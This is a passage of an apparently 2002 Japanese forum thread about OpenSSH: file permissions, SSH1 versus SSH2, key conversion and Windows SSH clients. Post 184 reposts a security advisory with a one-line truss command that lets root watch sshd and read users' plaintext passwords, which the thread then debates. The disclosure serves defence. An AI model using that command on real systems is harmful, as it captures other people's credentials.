じゃなくて match_user() を引数に hostname と ipaddr を追加し
た上で呼び出すようになり、match_user() のなかで user を '@'
で分割した上で前者を match_pattern()、後者を match_host_and_ip()
でそれぞれマッチするかどうかチェックするようになってますね。

実際に試しちゃいないけど、このコードなら 3.4 の man page に書
いてあるのと同じ動作をする筈。

ただ、開発者でもなんでもないおいらの話はもとより、開発者本人
のにしろその言を信じるってのは、『1 (ヵ月|週間|日|時間|分|秒)
前の自分は他人』の法則に則る限りお奨めできない。

ドキュメントや開発者本人がなんと言おうと、プログラムはソース
に書かれている通りにしか動きまへん。コードと自分の目を信じま
せう。

で、“Use the source, Luke”に関してはすでにいくつかフォローが
あるけど、このフレーズでぐぐってみればいろいろ当たるっす。なか
でも

ttp://burks.brighton.ac.uk/burks/foldoc/61/122.htm

辺りの説明が的確かしらん。
128 名前：名無しさん＠カラアゲうまうま メール：sage 投稿日：02/08/18 11:17: openssh にかぎらず、ドキュメンテーションって openbsd では
わりとおざなりにされてるような気がする。
129 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/18 22:50: /home/hoge/.ssh/authorized_keysとファイルを作ったのですが、
hogeのパーミッションを706とかにすると、
Authentication refused: bad ownership or modes for directory /home/hoge
とエラーが出てしまいます。
705だとログイン出来るのですが、その他ユーザの権限として書き込みの権限(2)を与えてはいけないんでしょうか。
130 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/18 22:53: >>129
少なくとも、好ましいことではないな。
131 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/18 23:00: >>129
sshd_configのStrictModesで挙動を変えられるが
お勧めはしない。
132 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/18 23:37: >>129
authorized_keysの中に勝手に鍵を追加されたりしたら、
誰でもあなたになりすますことができちゃいますよ。
133 名前：129ではないが… メール：sage 投稿日：02/08/19 00:23: >>132
いや、必ずしもauthorized_keysの内容が変更されるとは限らないYO！

>>129ではホームディレクトリ（/home/hoge）のパーミションの話はしているが、
~/.sshや~/.ssh/authorized_keysのパーミションについては何も言ってないから
な。

ホームディレクトリのパーミションを調べているのは、~/.[rs]hostsが関わってく
るからでしょう。ホームディレクトリが所有者以外に書き込み権限を与えられていた
ら、その権限を利用して~/.[rs]hostsを書き換えられる可能性があるからな。（直接
編集はできなくても削除→作成という手順で結果として書き換えることは可能）

>>129
ssh以外の部分でもいろいろ問題が出てくる（例：~/.profileとかも~.[rs]hostsと同様
書き換えられることになる）んだから、所有者以外に書き込み権限を与えるのは
やめとけ。
134 名前：124 メール：sage 投稿日：02/08/19 00:35: >>127
フォローThanksです。すなわち、ドキュメントとか見るより（そしてUsenetとかで
質問するより）実際にソースコードを読んだ方が早いYOってことね。
135 名前：129 投稿日：02/08/19 02:20: 皆さんありがとうございました。
確かに自分以外に権限を与えるのは危険ですね…。
参考になりました。
136 名前：名無しさん＠ＸＥｍａｃｓ (= 122) メール：sage 投稿日：02/08/19 16:33: >>134
>>126 (B-)

♯“方が早い”というよりは“方が確実だ”かな。結局全然早くない
♯ことも多い。
137 名前：yamasa メール：sage 投稿日：02/08/21 00:10: 前スレの910さん、遅くなりましたがQandA変更しておきました。
ttp://home.jp.FreeBSD.org/cgi-bin/QandA/readmail.cgi/QandA-work/5481
138 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/26 09:21: SSH1 Protocol に対して SSH2 Protocol の利点ってなんでしょうか？
139 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/26 10:00: >>138
Man in the middle attack について調べてきましょう。
140 名前：名無しさん＠ＸＥｍａｃｓ メール：sage 投稿日：02/08/26 13:19: >>139
> Man in the middle attack について調べてきましょう。

MITM に関しては SSH1 も SSH2 も等価。最初の一発はどっちもごまか
される可能性があるし、二回目以降はユーザ認証に公開鍵暗号を使っ
ていれば検出可能 (ただし、PKI に対応している商用版を持って来る
とまた話は別だが)。

いちばん大きな差はやっぱ integrity check の部分だろうね。SSH2は
CRC なんていい加減な方法ではなくちゃんとした MAC を用いているの
で、CORE SDI の insertioin attack に類似した型の攻撃が成立する
ことはほぼ不可能になってる (これ実は SSH1 でも成立しない筈なん
だけど)。
141 名前：名無しさん＠ＸＥｍａｃｓ (=140) メール：sage 投稿日：02/08/26 14:16: >>140
> MITM に関しては SSH1 も SSH2 も等価。最初の一発はどっちもごまか
> される可能性があるし、二回目以降はユーザ認証に公開鍵暗号を使っ
> ていれば検出可能 (ただし、PKI に対応している商用版を持って来る
> とまた話は別だが)。

ｽﾏｿ。この部分、嘘だった。正しくは

< MITM に関しては SSH1 も SSH2 も等価。ユーザ認証に公開鍵暗号を使っ
< ていれば一発目から検出可能。

だな。PKI 云々もあんま関係なかった。
142 名前：138 メール：sage 投稿日：02/08/26 18:25: ぐぐってみたらここの過去ログが出てきたよ～回線切って...
の前にスレの202あたりが結論って事でいいんでしょうか
143 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/26 21:31: > SSH1 Protocol に対して SSH2 Protocol の利点ってなんでしょうか？

mitm 以外にも、DH 鍵交換を使っているので、より安全。
と、されている。
144 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/27 10:54: >>142
> ぐぐってみたらここの過去ログが出てきたよ～回線切って...
> の前にスレの202あたりが結論って事でいいんでしょうか

どれどれ、見てみよう…。って、なるほど、この辺りが『SSH1 じゃダ
メだけど SSH2 なら MITM に対抗できる』という誤認識が普及した始
まりなわけね。

で、さらにそっから孫引用されている記事

http://sysadmin.oreilly.com/news/silverman_1200.html

も読んでみると、、、おい、この記事書いたの snail book の著者じゃ
ねーか。何考えてんだか。自分の本の記述と矛盾してるやん。

　In both SSH-1 and SSH-2, the key exchange is so designed
　that if she does this, the session identifiers for each
　side will be diferent.

Snail book (SSH The Secure Shell The Definitive Guide) p102 よ
り。“diferent”というスペルミスは原文ママ。引用文中の“this”っ
てのが MITM のこと。

で、正解は snail book の記述の方ね。

つーこって、誰が書いたものだろーとウェブ上の解説なんぞを信じる
とイタい目に逢うという新たな実例なんだ罠。

RTFS。
145 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/27 13:00: やっぱり夏はカレーだよね。
146 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/27 21:07: 夏カレー
乙カレー
うな重
147 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/28 08:47: ユーザ sshd ってなんに使うんでしょう?
FreeBSD-stable 上の openssh 3.4p1 ですが、
ps をとっても見当たらないし。

# FreeBSD 質問スレの方がよかったかな
148 名前：何度もガイシュツ メール：sage 投稿日：02/08/28 09:27: >>147
http://www.unixuser.org/~haruyama/security/openssh/README.privsep_nihongo.txt
149 名前：147 メール：sage 投稿日：02/08/28 11:28: ありがと & ガイシュツすまそ。
認証時に一時的に使われるんですね。ps とって確認しました。
150 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/29 21:21: authorized_keys の中にめちゃくちゃ鍵がたまってきてます。
もう使わないホストの公開鍵もあるはずなんですが、
どれがどれやら…

それぞれの鍵がいつ最後に使われたかを記録してくれるといいんですけどね。
みなさん、authorized_keys は太りすぎていませんか？
151 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/29 21:39: known_hostsじゃないの?
authorized_keys は使いまわすので1つか2つしか入れてないが…
152 名前：名無しさん＠お腹いっぱい。 投稿日：02/08/29 22:07: >>151 いや、各ホストですべて異なる鍵を ssh-keygen してるもんだから…
そうか、普通は異なるホストで全部異なる鍵ペアを作ったりしないのか…　鬱死

ところで、ssh-keygen で OpenSSH の鍵ファイル→ SSH2 の鍵ファイル　ってできます？
-i オプションで SSH2 → OpenSSH はできるみたいなんだけど。
OpenSSH 3.4p1　を Debian GNU/Linux と cygwin で使用中。
153 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/08/29 22:31: >>152
いや、ホストごとに ssh-keygen するもんでない?
キーのコメント (メールアドレス) で区別できない?
154 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/01 02:04: すみません、かなりDQNな質問はこちらでは可能でしょうか?
まだ自分でｻｰﾊﾞｰを立て始めて勉強している最中なのですが、
sshでﾘﾓｰﾄからpublic key認証でﾛｸﾞｲﾝしようとすると、

"No further authentication methods available."
No more authentication methods available.

と言われ、ﾛｸﾞｲﾝできません。
使っているｸﾗｲｱﾝﾄはSSH Secure Shell Client3.2.0.0(ちと古いですが）
ｻｰﾊﾞｰにはopenssh-3.1p1-3(RedHat7.3上にて)なのですが。

色々調べてみたのですが、ｸﾗｲｱﾝﾄでｼﾞｪﾈﾚｰﾄしたpublic keyを
ｻｰﾊﾞｰ上のhome/****/.sshにｱｯﾌﾟして、
ssh-keygen -i -f ******.dsa.pub >> authorized_keys2でｺﾝﾊﾞｰﾄ
しろ、という方法がSSHのFAQに出ていたので試してみたのですが、
さっぱりﾀﾞﾒでした。
何がいけない点なのかが、全くわかりません。。。
ものすごい厨房な質問で申し訳ないのですが、どなたか、ﾋﾝﾄを下さい。。。
155 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/01 02:26: > ところで、ssh-keygen で OpenSSH の鍵ファイル→ SSH2 の鍵ファイル　ってできます？

できます。
ssh-keygen -i -f ssh_com_pubkey → openssh_pubkey
ssh-keygen -e -f openssh_pubkey → ssh_com_pubkey

> さっぱりﾀﾞﾒでした。
> 何がいけない点なのかが、全くわかりません。。。

こっちも同感です。それだけの情報じゃね。
156 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/03 13:20: >>155　ありがとうございます。 -e オプションですか。
SECSH Public Key File Format に変換すればよかったんですね。
157 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/03 13:21: >>154　サーバ (sshd) のログを見てみると解決するかもしれませんよ。
あと、クライアント (ssh) で -v オプションを付けてみるというのはどうでしょうか？
158 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/05 02:08: >>154
そのバージョンってauthorized_keys2の2は必要?
159 名前：154ではないが メール：sage 投稿日：02/09/05 15:15: >>158
2.9.9より新しいバージョンなんでobsoleteではあるが、互換性を考慮して
「authorized_keys*2*でも可能」ということになっていると思うが、どうかな？

そのあたりの事情に詳しい人のフォローきぼん
160 名前：名無しさん＠ＸＥｍａｃｓ (=141) メール：sage 投稿日：02/09/06 10:50: >>157
> あと、クライアント (ssh) で -v オプションを付けてみるというのはどうでしょうか？

>>154 によるとクライアントは ssh.com 版らしいので、ssh -d 3 く
らいかな。

んで、まさかクライアント側で ~/.ssh2/identification を作ってい
ない、とかいうオチではないよね？
161 名前：名無しさん＠ＸＥｍａｃｓ メール：sage 投稿日：02/09/06 16:44: >>159
> 2.9.9より新しいバージョンなんでobsoleteではあるが、互換性を考慮して
> 「authorized_keys*2*でも可能」ということになっていると思うが、どうかな？
>
> そのあたりの事情に詳しい人のフォローきぼん

正確には『より新しい』じゃなく『以降の』バージョンでは、って
ことになるが、それ以外はその通り。

この辺りの措置は user_key_allowed という関数で行なわれるんだけ
ど、この関数、2.9.9 ～ 3.4p1 では、まず authorized_keys を試し、
それでうまく行かなかったら authorized_keys2 を試すようになって
いるようだ。
162 名前：159 メール：sage 投稿日：02/09/06 20:37: >>161
> 正確には『より新しい』じゃなく『以降の』バージョンでは、って
> ことになるが、

おっとっと、たしかにそうですね。

> この辺りの措置は user_key_allowed という関数で行なわれるんだけ
> [...]

なるほど、参考になりますた。んじゃ、それを元にソースのdiffをとったり
してみるYO!!　Thanks!!
163 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/11 00:37: 厨な質問ですみません。
パスフレーズを使用せずに、パスワードで認証を行う場合でも
そのパスワードは暗号化されているのですか？
164 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/11 00:49: RTFAQ
165 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/11 01:23: ↑つまんねーよ。
166 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/11 06:38: >>163
もう何度も出てきた質問でうんざり。ssh接続が確立した
時点で暗号化はされているので、パスワードも暗号化され
ている。
167 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/13 07:58: >>166　おそらくその「ssh接続が確立した時点」というのが正確に理解されていない場合が多いと思われ。
「認証が通った時点」と勘違いしている人もいるんだよね。
168 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/13 08:10: >「ssh接続が確立した時点」
>「認証が通った時点」
だっからどう違うの。おせえて、おせえて、おせえて
169 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/13 08:20: ssh -vして何が起きているのか眺めてください
170 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/13 08:58: sniff してみりゃいいじゃん。
171 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/13 09:00: >>168　TCP コネクション確立直後に、ホスト（サーバ）とクライアントの間で、ホスト鍵（各 sshd に固有の鍵、通常は sshd をインストールした時点で生成されて、それ以後は変更されることはない）の確認をする。
これによってホストがいつの間にか別のマシンにすりかえられていたりした場合に検出できる。
もしホスト鍵が以前そのホストに接続した時のものと異なっていたときには、警告される。

この時点で、以降のデータのやり取りを暗号化するための共通鍵が交換される。以降のデータのやり取りは、すべて暗号化される。いわゆる公開鍵暗号＋共通鍵暗号ハイブリッド方式。

いくつかある認証を試すのは、これ以降の話。たとえば「ユーザ名＋パスワード」による認証の際のデータも、すべて暗号化される。なので、安心。
172 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/13 09:02: >>171　なので、
「ssh接続が確立した時点」＝通信路を共通鍵暗号で暗号化するために必要な鍵の交換が終わった時点
「認証が通った時点」＝文字通り、認証にパスして、フォワーディングなどのセットアップが終わった時点
173 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/13 09:06: ちょっと古いけど、これ読め。
http://www.itojun.org/paper/wide-9811-ssh-tutorial/
174 名前：168 メール：sage 投稿日：02/09/13 09:23: >>169 - 173
みなさんご親切にありがとうございまひた
さよか、わてはまだ鍵の交換ができてないのに
認証を焦ってまひた
がんばりまふ
175 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/13 09:27: >>173　をいとぢゅん氏のか
176 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/14 18:41: ログイン時 .bashrcで、fortune等を実行していると,scpが利用できなくなります。
なんとかfortuneを実行させたいのですが、
シェルスクリプト等でscpによるセッションを判定できる方法ってありますか？
177 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/14 19:05: .bash_profile
.bash_login
.profile
178 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/14 19:40: >>177
cygwinスレに詳しく書いてあったので .bash_profileから実行してみました
そうすると、ログイン時しか表示されなくなります。
ktermなどの端末を開いた時すべてで表示させたいんです。
179 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/14 19:42: あ、全ての端末でログインオプションをつけりゃいいのか。
180 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/15 14:41: $PS1とか$BASHとか。
あるいは、ttyを持っているかどうか、という基準で
if tty >/dev/null 2>&1
という手もあるかも知れない。
181 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/15 14:44: 環境変数 SSH_TTY を確認すべし。
182 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/18 18:51: SSH のポートフォワーディングで、 Windows のファイル共有のためのトラフィック通せませんかね？
つまり NetBIOS over TCP/IP を通したいってことなんですが…
素直に PPTP　とかで VPN 張れってのは、無しの方向で。
183 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/18 21:18: WebDAV にしとけってこれも余り好ましくないけどな
184 名前：http://www.securiteam.com 投稿日：02/09/18 22:08: こんなの来たんだけど (((；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ???

OpenSSH 3.4p1 Allows Revealing of Password (Privsep Feature)
------------------------------------------------------------------------
SUMMARY

During authentication, OpenSSH 3.4p1 with privsep enabled passes the
cleartext password from the main process to the privsep child using a
pipe. Using strace or truss, root can see the user's plaintext password
flying by. Andrew observed this behavior from OpenSSH 3.4p1 built using
GCC on Solaris 2.8 and the current Debian OpenSSH 3.4p1 package.

DETAILS

The level of effort to determine clear text passwords, for even the most
inexperienced UNIX administrator, is almost zero given the above. Andrew
realizes that no matter how you slice it, it will be possible for root to
grab the password from wherever it is stored in memory. Alternatively,
recompile SSHd to log the password, or any number of other ways. However,
the methods Andrew just mentioned all require someone with significantly
more know how than:
truss -fp `cat /var/run/sshd.pid`

Vendor response:
Theo and Markus told Andrew that this is not an issue. Theo says that you
cannot prevent root from determining a user's password. Andrew does not
disagree but asked why OpenBSD bothers to encrypt user passwords at all if
that is his attitude.
185 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/18 22:25: ここが笑えますね。

ベンダの反応:
> Theo (de raadt) と Markus (Friedl) は発見者 Andrew に対し、これは問題にはならないと
> 伝えた。Theo いわく、root がユーザのパスワードを見るのを防ぐことはできないからだという。
> Andrew はこれを否定しなかったが、それならなぜ OpenBSD はユーザのパスワードを
> わざわざ暗号化しているのかとたずねた。
186 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/18 22:56: OpenSSHが偽物に摩り替えられていた事件で、相当に信頼が揺らいだ
気がする。
187 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/18 22:58: のっとられても絶対にファイルのすり替えをできない
ようなFTPサーバーを作ることは可能だと思うが、
どうだろうか？READONLYのファイルシステムあるいはライト
プロテクトのあるメディアにOSとかFTP用のファイルを置き、
ログは別のマシンに転送するという具合にやれば、
のっとられても、何もできないはずだが。。。
188 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/18 23:00: >>182 できます。
189 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/18 23:29: >>187
リモートで管理する限り不可能。
190 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/19 00:13: >>187
鋼鉄なんとかってやつでそういうのやってるよね
191 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/19 00:15: truss するだけなんて、あまりに簡単過ぎ。

main process が privsep child を fork する前に、あらかじめ共有鍵を
つくっておき、通信路をその共有鍵で暗号化するだけで解決するのに、
なんで問題じゃないとかいって見ないふりするんだろ？
192 名前：http://www.securiteam.com 投稿日：02/09/19 01:18: Web掲載されたのでage
http://www.securiteam.com/unixfocus/5VP0H2A8AK.html
193 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/19 01:37: 　　　ま　　　た　　　テ　　　オ　　　で　　　ラ　　　ア　　　ア　　づ　　　か
194 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/19 02:14: >>191
rootなんだから、kmemでもなんでも見れるから、ってことじゃないの？
というかrootがその気になればsshd入れかえることだってできるんだし、
見ようと思ったらいつでも見れるでしょう。

でもまぁ確かに、お手軽ではあるけどね。
195 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/19 02:23: >>194
乗っ取られた時点で負けというのは確かなんだが、それでもパスワード収集
までに時間と手間を掛けさせるのは、セキュリティ面では意味があると思うな。

そファイル入れ替えは tripwire なんかでトラップが張ってあれば検出できる
可能性もあるしさ。
196 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/19 02:31: Theoのあのガキっぽさはなかなか気に入ってるんだけどな。
197 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/19 10:50: >>194

もちろんその通りだし、心底悪意のある root に対しては、
RSAAuthenticationのような手段をとらない限り、普通は
対抗しようがない。
じゃ直さなくてもまったく問題がないかというと、そうでもなくて
・侵入者に対抗するするため、実行可能なファイルを置いた
　パーティションは全て read only mount し、侵入者が
　侵入用コマンドを実行できないようにした状態でも、
　システムにあらかじめインストールされているコマンドだけ
　を使って、ごく簡単に password を盗める
・悪意のある侵入者ではなく正規の管理者が、ちょっとした
　できごころを起こした場合にも危険
といったことを考えると、やはり問題だろ。

> Theoのあのガキっぽさはなかなか気に入ってるんだけどな。

俺はガキに自分の身の安全を委ねたくはないんだけどなー。
現状では OpenSSH 以外に選択肢がないのがなんとも。
198 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/19 22:13: > 俺はガキに自分の身の安全を委ねたくはないんだけどなー。

とはいっても、実際には現代人の日常生活の大部分は
何らかのかたちでドキュソに支えられてるわけでさ。
199 名前：初期不良 メール：sage 投稿日：02/09/21 13:43: >>198
そう言うのが嫌な人はこっち使えばいいんじゃないの？
http://www.ssh.com/
200 名前：名無しさん＠お腹いっぱい。 メール：ネタsage 投稿日：02/09/21 15:01: ？ttp://cr.yp.to/djbssh.html
201 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/21 16:15: >>199-200
どっちもライセンスの問題で安心して使えない罠
202 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/21 16:47: >>200 みえない…
203 名前：名無しさん メール：sage 投稿日：02/09/21 19:26: >>202
だってないもん。
204 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/21 19:29: >>203 (T_T)
205 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/21 20:21: >>202
djb 厨には見えてるらしい
206 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/21 22:49: 「サンがOpenSSLプロジェクトに暗号化技術を提供」
http://japan.cnet.com/Enterprise/News/2002/Item/020920-3.html

これって使用もfreeなのかな?
だったらsshでも、鍵交換にECDHアルゴリズムを使ったり、
/etc/ssh/ssh_host_ecdsa_key なんてファイルができてたり
するようになるのかな。
207 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/22 20:17: ttp://www.ayera.com/teraterm/
TeraTerm Pro Web 3.1.1 - Enhanced Telnet/SSH2 Client
ｷﾀｰ
208 名前：名無しさん＠Ｅｍａｃｓ メール：sage 投稿日：02/09/22 20:19: >>207
マルチうざ
209 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/22 20:34: >>207
やったー。情報ありがとう。
>>208
マルチでいいのと悪いのと区別しろYo
210 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/22 20:37: >>207
ttp://www.ayera.com/teraterm/ttermpro_311.zip
ダウソできませんが、何か?
211 名前：!208 メール：sage 投稿日：02/09/22 20:40: >>209
うぜぇのはうぜえよ。
212 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/22 21:00: >207=209
分かり易すぎ
213 名前：207 メール：sage 投稿日：02/09/22 21:01: >>209
support@ayera.comに掛け合ってみますー。
ということでメール出してみました。
214 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/22 21:23: ﾀﾞｳｿできない。
215 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/22 21:28: >>212
ちがわい。>>209はただtsshの糞ユーザに過ぎんがな、
一回SSH2のサーバ作ってつながらなくて苦労した馬鹿だ。＞漏れのこと
漏れの他にも感動してる奴に>>210なんてのもいるじゃん。
>>207は大人だ。
216 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/22 21:54: >tssh
（ ´,_ゝ｀）ﾌﾟｯ
217 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/22 21:59: tssh って何！？
218 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/22 22:03: >>216, >>217
tsshってｔｔｓｓｈのことです。手が滑ったのが
分からないお前らはｱﾌｫですか。
219 名前：!216 && !217 メール：sage 投稿日：02/09/22 22:11: Tera Term SSHってttsshって略すのか。漏れ、tcshかと思ったよ…。
220 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/22 22:24: 略でなくて、TTSSH が正式名でなかったっけ?
221 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/22 22:29: でもなぁ、もう PuTTY に慣れちゃったし、いまさら感が否めないなぁ。
222 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/22 22:33: まだPuTTYに手を出したばっかりの漏れには朗報ナリ。
一応期待。
223 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/22 22:54: 今さらteratermのダッサイインターフェースなんかに戻れない
224 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 00:03: 今さらWindowsのダッサイインターフェースなんかに戻れない
225 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 00:19: 今さらcommand.comのダッサイインターフェイスなんかに戻れない
226 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 00:25: >>225
まぁ少なくともbashやtcshに比べたら遥かにダサイわな。
227 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 00:35: >>225
cmd.exe っていうのがかなりイイらしいよ
228 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 00:51: >227
50歩100歩
どんぐりの背比べ
229 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 00:56: >>227
それより ssh ってのがかなりオススメ
230 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/23 05:22: >>207
現在も>>210と同様、ダウンロードできないのだが…、ダウンロードできた人いる？
いたら使用した感想などをｷﾎﾞﾝﾇ
231 名前：ダウソage メール：age 投稿日：02/09/23 17:48: >>230
ダウソできたよ！

TTSSH組み込んだ感じとほぼ同じ。SSH Forwardが無い。
謎のHTTPサーバ機能が付いてる。
232 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 18:55: >>231
ssh でつないで、ls -l ~/ とかやると、
[ENTER] を何度か打たないとリスト全部を表示できない。
バッファリングまわりが変なのかなぁ？
233 名前：207 メール：sage 投稿日：02/09/23 19:28: >>213
CEOから謝罪メールが返信されてきますた。
かなり吃驚。
234 名前：名無しさん＠Ｅｍａｃｓ メール：sage 投稿日：02/09/23 19:31: >>232
もしかして使えない？
235 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 19:42: >>234
こんなんなるの俺だけなのかなぁ？ほかのひとは大丈夫なの？
サーバ側は、FreeBSD 4.5 の OpenSSH 3.4p1 で、特別な設定は特になし。
クライアントは、SSH 関係の設定はデフォルトのまま、圧縮とかもなし。
236 名前：231 メール：sage 投稿日：02/09/23 19:50: >>232
家も同じく。

WinXPにコレと、相手はVine2.1にOpenSSH 3.4p1
圧縮は無し。
237 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 20:35: >232
うちでも同じ。
接続先は Solaris 8 + OpenSSH 3.4p1

あと、EUC が使えないことに気づいたんで、
もう削除しちゃいました。
SJISなら一応表示はできてたけど。
238 名前：235 メール：sage 投稿日：02/09/23 20:41: >>237
WinXP ですが、うちでは Setup のデフォルトの SJIS を EUC にして EUC 使えたよ。
239 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 21:12: 確かに表示が変だね。
240 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 21:13: 公開鍵認証には対応していないのかな？
241 名前：初期不良 メール：sage 投稿日：02/09/23 21:20: >>240
うーむ、公開鍵認証オンリーにしてるから接続すらできん...
242 名前：231 メール：sage 投稿日：02/09/23 21:26: 表示変だね。バッファに入ってるものが詰まって出る
みたいな感じ。文字化けとかは無くって、EUCで問題ないよ

screen使ってmew@emacsとか使うと画面切り替わりの際の
^Lは必須。この点だけでも直してくれないかなあ。
243 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 21:54: てか、わざわざ TeraTerm 上に載せる意味なんかあるの？
244 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 21:57: 基本的な機能は TeraTerm のを利用するから 0から作るようりは簡単とかじゃない？
245 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 22:00: LAN 上の Windows から普通に接続してもこんなのが記録されるね。

Did not receive identification string from 192.168.0.3
246 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 22:01: >>243
シリアルコンソールも telnet も SSH も SSH2 も
みんな同じソフト上でできるならそれに越したことないんじゃない？
247 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 22:19: >246
PuTTYも全部できるが？
248 名前：246 メール：sage 投稿日：02/09/23 22:21: ごめん、微妙に嘘ついた。シリアルは出来ないね。
でも全部詰め込むメリットって何？
249 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 22:26: 1つあれば用が足りる。
250 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 23:16: Tera Term に慣れてるから、とか。
なぜそんなに詰めこむのを嫌うの?
251 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/23 23:39: djb信者のかほり～
252 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/24 01:15: toolbox approach ?
253 名前：名無しさん＠お腹いっぱい。 投稿日：02/09/26 00:35: TeraTerm Pro Web 3.1.2 - Enhanced Telnet/SSH2 Client
となっているんで試したのですが、皆さん^H^H^Hお前らと同じ状況ですね。
バッファリングが変。
[Setup]-[Recurring Command]ってなに？
3.1.1 の頃からあるのでしょうか？
254 名前：i6245 メール：sage 投稿日：02/09/26 01:09: 俺 TeraTermPro + ttssh 使ってるなぁ。
Macro 結構組んでるから今更違うのに変えるのも面倒だ。。
そういえばなんで PuTTY 使わなかったんだろう。
良く覚えてないや。。

WinSCPは使ってるけど。。
255 名前：名無しさん＠お腹いっぱい。 メール：sage 投稿日：02/09/26 13:03: >>240

Win2000 で putty の pagent を常駐させているのだが、そっから勝手に鍵データとってきて、公開鍵認証やるみたい。
ユーザ名を指定するだけで、パスワード無しで接続されてしまった。
256 名前：名無しさん＠お腹いっぱい メール：sage 投稿日：02/09/26 17:41: いきなりですみません、WinSCPで質問なのですが・・・。
実は以下のことで確認をしたいので、どなたか親切な方、
教えてやって下さい。

